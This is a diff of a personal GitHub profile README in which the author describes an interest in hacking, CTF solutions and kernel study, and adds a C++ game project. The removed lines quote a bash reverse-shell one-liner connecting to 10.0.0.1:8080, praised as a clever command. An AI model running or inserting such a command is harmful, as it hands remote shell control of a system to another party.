marc-gav/marc-gav/README.md

 <p align="left"> <img src="https://komarev.com/ghpvc/?username=marc-gav&label=Profile%20views&color=0e75b6&style=flat" alt="marc-gav" /> </p>

 ## About me
 Probably my favourite thing about technology is the concept of hacking: "Playful solving of technical work that requires deep understanding, especially of a computer system."

-In my free time I like to get increasingly deep understanding of different technologies and apply it to solving CTF challenges: You can find some of my solutions in this repo: https://github.com/marc-gav/picoCTF_solutions.
-I stopped adding new solutions because honestly you can find better write-ups for picoCTF on youtube from people that know more than me.

 I am currenly learning about the Linux kernel, reverse engineering and network protocols.

-Slightly unrelated, after a couple years of using bash I discovered this snippet of code: `bash -i >& /dev/tcp/10.0.0.1/8080 0>&1`.
-I think it's beautiful to think of the different ideas that need to come together into one single bash command to form a reverse shell.
+## Working on
+Pokemon Red inspired game in C++: https://github.com/PrettyHackyDevs/Re-Pokemon-Red.
+Feel free to contribute if you like it.

 ## Previously working on